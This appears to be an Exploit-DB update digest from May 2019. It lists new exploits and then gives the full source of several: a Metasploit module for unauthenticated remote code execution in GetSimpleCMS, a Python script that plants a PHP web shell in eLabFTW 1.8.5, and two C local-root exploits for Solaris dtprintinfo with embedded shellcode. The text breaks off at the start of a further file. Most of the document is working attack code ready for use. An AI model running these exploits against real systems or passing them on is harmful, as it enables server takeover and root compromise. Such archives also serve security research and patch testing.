DB: 2019-05-21

16 changes to exploits/shellcodes

Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)
Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow
Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow
Encrypt PDF 2.3 - Denial of Service (PoC)
PCL Converter 2.7 - Denial of Service (PoC)
docPrint Pro 8.0 - Denial of Service (PoC)
AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
Huawei eSpace 1.1.11.103 - DLL Hijacking
Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)

eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution

Linux x86_64 - Delete File Shellcode (28 bytes)

exploits/php/remote/46880.rb

@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "GetSimpleCMS Unauthenticated RCE",
+      'Description'    => %q{
+        This module exploits a vulnerability found in GetSimpleCMS,
+        which allows unauthenticated attackers to perform Remote Code Execution.
+        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
+        however authentication can be bypassed by leaking the cms API key to target the session manager.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-11231'],
+          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['GetSimpleCMS 3.3.15 and before', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 28 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
+      ])
+  end
+
+  def gscms_version
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
+      )
+      return unless res && res.code == 200
+
+      generator = res.get_html_document.at(
+        '//script[@type = "text/javascript"]/@src'
+        )
+
+      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
+      vers = generator.value.split('?v=').last.gsub(".","")
+      return unless vers
+      @version = vers
+  end
+
+  def get_salt
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
+    @salt = res.get_xml_document.at('apikey').text
+  end
+
+  def get_user
+    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
+    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
+  end
+
+  def gen_cookie(version,salt,username)
+    cookie_name = "getsimple_cookie_#{version}"
+    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")
+
+    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
+    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
+  end
+  def get_nonce(cookie)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
+      'cookie' =>  cookie,
+      'vars_get' => {
+          't' => 'Innovation',
+          'f' => 'Default Template',
+          's' => 'Edit'
+      }
+    })
+
+    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
+    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
+    end
+    version = gscms_version
+    salt = get_salt
+    username = get_user
+    cookie = gen_cookie(version,salt,username)
+    nonce = get_nonce(cookie)
+
+    fname = "#{rand_text_alpha(6..16)}.php"
+    php   = %Q|<?php #{payload.encoded} ?>|
+    upload_file(cookie,nonce,fname,php)
+    send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path,'theme',fname),
+    })
+  end
+
+  def check
+    version = gscms_version
+    unless version
+        return CheckCode::Safe
+    end
+    vprint_status "GetSimpleCMS version #{version}"
+    unless vulnerable
+        return CheckCode::Detected
+    end
+    CheckCode::Vulnerable
+  end
+
+  def vulnerable
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+    return true
+  end
+
+  def upload_file(cookie,nonce,fname,content)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'submitsave'    => 2,
+        'edited_file' => fname,
+        'content' => content,
+        'nonce' => nonce
+      }
+    })
+  end
+end

exploits/php/webapps/46869.py

@@ -0,0 +1,166 @@
+#!/usr/bin/env python
+#
+# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary
+File Upload / RCE
+# Date                  : 5/18/19
+# Exploit Author        : liquidsky (JMcPeters)
+# Vulnerable Software   : eLabFTW 1.8.5
+# Vendor Homepage       : https://www.elabftw.net/
+# Version               : 1.8.5
+# Software Link         : https://github.com/elabftw/elabftw
+# Tested On             : Linux / PHP Version 7.0.33 / Default
+installation (Softaculous)
+# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
+#
+# Greetz : wetw0rk, offsec ^^
+#
+# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads
+via the /app/controllers/EntityController.php component.
+# This may result in remote command execution. An attacker can use a
+user account to fully compromise the system using a POST request.
+# This will allow for PHP files to be written to the web root, and for
+code to execute on the remote server.
+#
+# Notes: Once this is done a php shell will drop at https://[target
+site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long
+alphanumeric].php5?e=whoami
+# You will have to visit the uploads directory on the site to see what
+the name is. However there is no protection against directory listing.
+# So this can be done by an attacker remotely.
+
+import requests
+from bs4 import BeautifulSoup as bs4
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+import sys
+import time
+
+print "+-------------------------------------------------------------+"
+print
+print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE"
+print
+print "-          Discovery / PoC by liquidsky (JMcPeters) ^^"
+print
+print "+-------------------------------------------------------------+"
+
+try:
+
+target = sys.argv[1]
+email = sys.argv[2]
+password = sys.argv[3]
+directory = sys.argv[4]
+
+except IndexError:
+
+        print
+print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0]
+print "- Example: %s incidentsecurity.com user@email.com mypassword
+elabftw" % sys.argv[0]
+        print
+sys.exit()
+
+
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+
+# The payload to send
+data = ""
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37"
+data += "\x32\x31\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39"
+data += "\x34\x31\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a"
+data += "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69"
+data += "\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61"
+data += "\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64\x22"
+data += "\x0d\x0a\x0d\x0a\x74\x72\x75\x65\x0d\x0a\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36\x37\x35"
+data += "\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31\x31\x36"
+data += "\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f\x6e\x74\x65"
+data += "\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a"
+data += "\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d"
+data += "\x65\x3d\x22\x69\x64\x22\x0d\x0a\x0d\x0a\x34\x0d\x0a\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
+data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
+data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
+data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
+data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
+data += "\x6e\x61\x6d\x65\x3d\x22\x74\x79\x70\x65\x22\x0d\x0a\x0d\x0a"
+data += "\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x73\x0d\x0a\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
+data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
+data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
+data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
+data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
+data += "\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x22\x3b\x20\x66\x69"
+data += "\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x70\x6f\x63\x33\x2e\x70\x68"
+data += "\x70\x35\x22\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79"
+data += "\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e"
+data += "\x2f\x78\x2d\x70\x68\x70\x0d\x0a\x0d\x0a\x3c\x3f\x70\x68\x70"
+data += "\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65"
+data += "\x63\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x27\x5d\x2e\x27\x20"
+data += "\x32\x3e\x26\x31\x27\x29\x3b\x20\x3f\x3e\x0d\x0a\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36"
+data += "\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31"
+data += "\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x2d\x2d\x0d\x0a"
+
+s = requests.Session()
+
+print "[*] Visiting eLabFTW Site"
+r = s.get('https://' + target + '/' + directory +
+'/login.php',verify=False, proxies=proxies)
+print "[x]"
+
+# Grabbing token
+html_bytes = r.text
+soup = bs4(html_bytes, 'lxml')
+token = soup.find('input', {'name':'formkey'})['value']
+
+values = {'email': email,
+          'password': password,
+          'formkey': token,}
+
+time.sleep(2)
+
+print "[*] Logging in to eLabFTW"
+
+r = s.post('https://' + target + '/' + directory +
+'/app/controllers/LoginController.php', data=values, verify=False,
+proxies=proxies)
+
+print "[x] Logged in :)"
+
+time.sleep(2)
+
+sessionId = s.cookies['PHPSESSID']
+
+headers = {
+    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
+    #Host: incidentsecurity.com
+    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0)
+Gecko/20100101 Firefox/52.0",
+    "Accept": "application/json",
+    "Accept-Language": "en-US,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate",
+    #Referer: https://incidentsecurity.com
+    "Cache-Control": "no-cache",
+    "X-Requested-With": "XMLHttpRequest",
+    "Content-Length": "588",
+    "Content-Type": "multipart/form-data;
+boundary=---------------------------72167598110874594111630395077",
+    "Connection": "close",
+    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
+}
+
+print "[*] Sending payload..."
+r = s.post('https://' + target + '/' + directory +
+'/app/controllers/EntityController.php',verify=False, headers=headers,
+data=data, proxies=proxies)
+print "[x] Payload sent"
+print
+print "Now check https://%s/%s/uploads" % (target, directory)
+print "Your php shell will be there under a random name (.php5)"
+print
+print "i.e https://[vulnerable
+site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"

exploits/solaris/local/46877.c

@@ -0,0 +1,285 @@
+/*
+ * raptor_dtprintname_intel.c - dtprintinfo 0day, Solaris/Intel
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * This exploit uses the ret-into-ld.so technique to bypass the non-exec 
+ * stack protection. If experiencing troubles with null-bytes inside the 
+ * ld.so.1 memory space, try returning to sprintf() instead of strcpy().
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_intel.c -o raptor_dtprintname_intel -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_intel 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=1(other)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also vulnerable]
+ */
+
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_intel.c - dtprintinfo 0day, Solaris/Intel"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	check_zero(int addr, char *pattern);
+int	search_ldso(char *sym);
+int	search_rwx_mem(void);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], ksh_var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, sc_addr, ksh_pos;
+	int	plat_len, prog_len;
+
+	char	*arg[2] = {"foo", NULL};
+	int	sb = ((int)argv[0] | 0xfff);	/* stack base */
+	int	ret = search_ldso("strcpy");	/* or sprintf */
+	int	rwx_mem = search_rwx_mem();	/* rwx memory */
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get the shellcode address from the environment */
+		sc_addr = (int)strtoul(getenv("KSH"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with ld.so.1 address, saved eip, and arguments */
+		for (i = 0; i < BUFSIZE; i += 4) {
+			set_val(buf, i, ret);		/* strcpy */
+			set_val(buf, i += 4, rwx_mem);	/* saved eip */
+			set_val(buf, i += 4, rwx_mem);	/* 1st argument */
+			set_val(buf, i += 4, sc_addr);	/* 2nd argument */
+		}
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+
+	/* fill the envp, keeping padding */
+	add_env(sc);
+	ksh_pos = env_pos;
+	add_env("KSH=0x42424242");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to the shellcode */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = 5 + env_len + plat_len + prog_len;
+
+	/* calculate the shellcode address */
+	sc_addr = sb - offset;
+
+	/* overwrite the KSH env var with the right address */
+	sprintf(ksh_var, "KSH=0x%x", sc_addr);
+	env[ksh_pos] = ksh_var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+	    !(addr & 0xff000000)) {
+		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+		exit(1);
+	}
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+	int		addr;
+	void		*handle;
+	Link_map	*lm;
+
+	/* open the executable object file */
+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+		perror("dlopen");
+		exit(1);
+	}
+
+	/* get dynamic load information */
+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+		perror("dlinfo");
+		exit(1);
+	}
+
+	/* search for the address of the symbol */
+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
+		fprintf(stderr, "sorry, function %s() not found\n", sym);
+		exit(1);
+	}
+
+	/* close the executable object file */
+	dlclose(handle);
+
+	check_zero(addr - 4, sym);
+	return(addr);
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+	int	fd;
+	char	tmp[16];
+	prmap_t	map;
+	int	addr = 0, addr_old;
+
+	/* open the proc filesystem */
+	sprintf(tmp,"/proc/%d/map", (int)getpid());
+	if ((fd = open(tmp, O_RDONLY)) < 0) {
+		fprintf(stderr, "can't open %s\n", tmp);
+		exit(1);
+	}
+
+	/* search for the last RWX memory segment before stack (last - 1) */
+	while (read(fd, &map, sizeof(map)))
+		if (map.pr_vaddr)
+			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+				addr_old = addr;
+				addr = map.pr_vaddr;
+			}
+	close(fd);
+
+	/* add 4 to the exact address NULL bytes */
+	if (!(addr_old & 0xff))
+		addr_old |= 0x04;
+	if (!(addr_old & 0xff00))
+		addr_old |= 0x0400;
+
+	return(addr_old);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0x000000ff);
+	buf[pos + 1] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 2] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 3] =	(val & 0xff000000) >> 24;
+}

exploits/solaris/local/46878.c

@@ -0,0 +1,198 @@
+/*
+ * raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_sparc.c -o raptor_dtprintname_sparc -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_sparc 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=10(staff)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1
+ * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
+ * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10
+ * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+
+/* voodoo macros */
+#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
+#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}
+
+char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
+/* double setuid() */
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+/* execve() */
+"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
+"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
+"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, ret, var_pos;
+	int	plat_len, prog_len, rel;
+
+	char	*arg[2] = {"foo", NULL};
+	int	arg_len = 4, arg_pos = 1;
+
+	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get ret address from environment */
+		ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with return address */
+		for (i = 0; i < BUFSIZE; i += 4)
+			set_val(buf, i, ret - 8);
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+	rel = atoi(release + 2);
+
+	/* fill the envp, keeping padding */
+	add_env(sc);
+	var_pos = env_pos;
+	add_env("RET=0x41414141");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to argv[0] (voodoo magic) */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = arg_len + env_len + plat_len + prog_len;
+	if (rel > 7)
+		VOODOO64(offset, arg_pos, env_pos)
+	else
+		VOODOO32(offset, plat_len, prog_len)
+
+	/* calculate the needed addresses */
+	ret = sb - offset + arg_len;
+
+	/* overwrite the RET env var with the right ret address */
+	sprintf(var, "RET=0x%x", ret);
+	env[var_pos] = var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0xff000000) >> 24;
+	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 3] =	(val & 0x000000ff);
+}

exploits/solaris/local/46879.c

@@ -0,0 +1,341 @@
+/*
